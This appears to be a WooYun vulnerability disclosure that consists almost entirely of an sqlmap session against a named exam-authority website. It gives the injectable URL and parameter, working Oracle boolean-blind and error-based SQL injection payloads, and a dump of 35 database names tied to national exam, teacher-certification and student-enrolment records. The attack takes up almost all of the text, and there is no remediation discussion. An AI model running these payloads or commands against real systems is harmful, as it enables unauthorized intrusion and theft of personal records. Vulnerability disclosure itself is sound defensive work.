WooYun.org

root@Hacker~# Sqlmap -u http://zxks.nm.zsks.cn/zkweb/zk_kkzykc.jsp?zydm=020106
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 20:51:43
[20:51:43] [INFO] testing connection to the target url
[20:51:43] [INFO] testing if the url is stable, wait a few seconds
[20:51:45] [INFO] url is stable
[20:51:45] [INFO] testing if GET parameter 'zydm' is dynamic
[20:51:45] [INFO] confirming that GET parameter 'zydm' is dynamic
[20:51:45] [INFO] GET parameter 'zydm' is dynamic
[20:51:45] [INFO] heuristic test shows that GET parameter 'zydm' might be inject
able (possible DBMS: Oracle)
[20:51:45] [INFO] testing for SQL injection on GET parameter 'zydm'
[20:51:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:51:46] [INFO] GET parameter 'zydm' is 'AND boolean-based blind - WHERE or HA
VING clause' injectable
[20:51:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[20:51:46] [INFO] GET parameter 'zydm' is 'Oracle AND error-based - WHERE or HAV
ING clause (XMLType)' injectable
[20:51:46] [INFO] testing 'Oracle AND time-based blind'
[20:51:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:51:46] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[20:51:47] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[20:51:48] [INFO] target url appears to have 21 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[20:51:59] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. --dbms=mysql)
GET parameter 'zydm' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 104 HTTP(s) req
uests:
---
Place: GET
Parameter: zydm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: zydm=020106' AND 8641=8641 AND 'VRWf'='VRWf
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: zydm=020106' AND 1988=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(1
16)||CHR(121)||CHR(119)||CHR(58)||(SELECT (CASE WHEN (1988=1988) THEN 1 ELSE 0 E
ND) FROM DUAL)||CHR(58)||CHR(100)||CHR(105)||CHR(100)||CHR(58)||CHR(62))) FROM D
UAL) AND 'bVGO'='bVGO
---
[20:52:32] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[20:52:32] [INFO] fetched data logged to text files under 'D:\SQLMAP~1.3\B
in\output\zxks.nm.zsks.cn'
[*] shutting down at 20:52:32
-----------yD的分割线------------------------------------------------
available databases [35]:
[*] BSEN
[*] CET 全国大学英语等级考试
[*] CF
[*] EC_JXX
[*] GSZK 自考
[*] HRF
[*] JZG教师资格
[*] KCGL（xx）管理
[*] KSZXOA考试中心OA
[*] LIQ
[*] LZY
[*] NCRE 全国计算机等级考试
[*] PETS 全国英语等级考试
[*] QHL
[*] SECUREDB
[*] SHD
[*] SLT
[*] SLT8
[*] SYS
[*] SYSTEM
[*] XJZC 学籍注册
[*] YJS（研究生）
[*] YJS2013（2013研究生）
[*] YJSPKC
[*] ZBJS自治农村特岗教师
[*] ZGL招生管理
[*] ZHONGZHAO（中专招生）
[*] ZZLK
[*] ZZY
----------------YD分割线----------------------------------------------